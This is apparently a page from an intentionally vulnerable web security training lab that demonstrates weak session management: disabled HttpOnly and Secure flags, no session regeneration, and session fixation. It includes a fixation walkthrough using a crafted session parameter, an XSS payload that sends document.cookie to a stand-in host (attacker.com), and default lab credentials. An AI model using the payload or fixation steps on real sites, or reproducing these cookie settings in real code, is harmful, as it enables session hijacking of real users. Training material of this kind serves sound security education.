โ† Back to Dashboard

Login

Current Session Info:

Session ID:
Cookie Name: PHPSESSID
HttpOnly: โŒ Disabled
Secure Flag: โŒ Disabled

Session Data:

Array ( )

JavaScript Cookie Access:

โš ๏ธ HttpOnly is disabled - JavaScript can read/steal session!

๐ŸŽฏ Vulnerability Info

Type: Weak Session Management

Severity: High

๐Ÿ’ก Vulnerabilities Present

  • HttpOnly flag disabled (XSS can steal session)
  • Secure flag disabled (works over HTTP)
  • No session regeneration on login
  • Predictable session IDs possible
  • Session fixation possible

๐Ÿงช Session Fixation Attack

  1. Attacker creates fixed session ID
  2. Sends link with session: ?set_session=ATTACKER123
  3. Victim clicks and logs in
  4. Attacker uses same session ID to hijack

๐Ÿ”ง Test Links

๐Ÿ“ Steal Session via XSS

<script> new Image().src="http://attacker.com/steal?c="+document.cookie; </script>

๐Ÿ“š Credentials

  • admin / admin123
  • user / user123